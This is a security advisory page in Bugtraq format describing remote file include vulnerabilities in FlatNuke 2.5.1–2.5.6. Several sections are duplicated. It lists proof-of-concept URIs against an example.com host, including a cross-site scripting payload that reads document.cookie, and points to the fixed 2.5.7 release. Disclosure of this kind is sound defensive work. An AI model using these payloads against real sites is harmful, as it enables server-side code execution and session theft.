FlatNuke Index.PHP Multiple Remote File Include Vulnerabilities
BID:15172
Info
FlatNuke Index.PHP Multiple Remote File Include Vulnerabilities
| Bugtraq ID: | 15172 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Oct 22 2005 12:00AM |
| Updated: | Oct 22 2005 12:00AM |
| Credit: | [email protected] is credited with the discovery of this vulnerability. |
| Vulnerable: |
FlatNuke FlatNuke 2.5.6 FlatNuke FlatNuke 2.5.5 FlatNuke FlatNuke 2.5.4 FlatNuke FlatNuke 2.5.3 FlatNuke FlatNuke 2.5.2 FlatNuke FlatNuke 2.5.1 |
| Not Vulnerable: |
FlatNuke FlatNuke 2.5.7 |
Discussion
FlatNuke Index.PHP Multiple Remote File Include Vulnerabilities
FlatNuke is prone to multiple remote file include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input.
An attacker may leverage any of these issues to execute arbitrary server-side script code on an affected computer with the privileges of the Web server process. This may facilitate unauthorized access.
It should be noted that a malicious user must have an account and be logged into the application to exploit these vulnerabilities.
FlatNuke is prone to multiple remote file include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input.
An attacker may leverage any of these issues to execute arbitrary server-side script code on an affected computer with the privileges of the Web server process. This may facilitate unauthorized access.
It should be noted that a malicious user must have an account and be logged into the application to exploit these vulnerabilities.
Exploit / POC
FlatNuke Index.PHP Multiple Remote File Include Vulnerabilities
No exploit is required.
The following proof of concept URI are available:
http://www.example.com/flatnuke/forum/index.php?op=profile&user=[abducter]
http://www.example.com/flatnuke/forum/index.php?op=topic&quale=[abducter]
http://www.example.com/flatnuke/forum/index.php?op=newtopic&mode=ris&quale=[abducter]&page=1
http://www.example.com/flatnuke/forum/index.php?op=profile&user=%3Cscript%3Ealert(document.cookie);%3C/script%3E
No exploit is required.
The following proof of concept URI are available:
http://www.example.com/flatnuke/forum/index.php?op=profile&user=[abducter]
http://www.example.com/flatnuke/forum/index.php?op=topic&quale=[abducter]
http://www.example.com/flatnuke/forum/index.php?op=newtopic&mode=ris&quale=[abducter]&page=1
http://www.example.com/flatnuke/forum/index.php?op=profile&user=%3Cscript%3Ealert(document.cookie);%3C/script%3E
Solution / Fix
FlatNuke Index.PHP Multiple Remote File Include Vulnerabilities
Solution:
The vendor has addressed this issue in the latest stable release. Users should contact the vendor for further information.
FlatNuke FlatNuke 2.5.1
FlatNuke FlatNuke 2.5.2
FlatNuke FlatNuke 2.5.3
FlatNuke FlatNuke 2.5.4
FlatNuke FlatNuke 2.5.5
FlatNuke FlatNuke 2.5.6
Solution:
The vendor has addressed this issue in the latest stable release. Users should contact the vendor for further information.
FlatNuke FlatNuke 2.5.1
-
FlatNuke flatnuke-2.5.7-20051024.tar.gz
http://flatnuke.sourceforge.net/nightly/flatnuke-2.5.7-20051024.tar.gz
FlatNuke FlatNuke 2.5.2
-
FlatNuke flatnuke-2.5.7-20051024.tar.gz
http://flatnuke.sourceforge.net/nightly/flatnuke-2.5.7-20051024.tar.gz
FlatNuke FlatNuke 2.5.3
-
FlatNuke flatnuke-2.5.7-20051024.tar.gz
http://flatnuke.sourceforge.net/nightly/flatnuke-2.5.7-20051024.tar.gz
FlatNuke FlatNuke 2.5.4
-
FlatNuke flatnuke-2.5.7-20051024.tar.gz
http://flatnuke.sourceforge.net/nightly/flatnuke-2.5.7-20051024.tar.gz
FlatNuke FlatNuke 2.5.5
-
FlatNuke flatnuke-2.5.7-20051024.tar.gz
http://flatnuke.sourceforge.net/nightly/flatnuke-2.5.7-20051024.tar.gz
FlatNuke FlatNuke 2.5.6
-
FlatNuke flatnuke-2.5.7-20051024.tar.gz
http://flatnuke.sourceforge.net/nightly/flatnuke-2.5.7-20051024.tar.gz
References
FlatNuke Index.PHP Multiple Remote File Include Vulnerabilities
References:
References: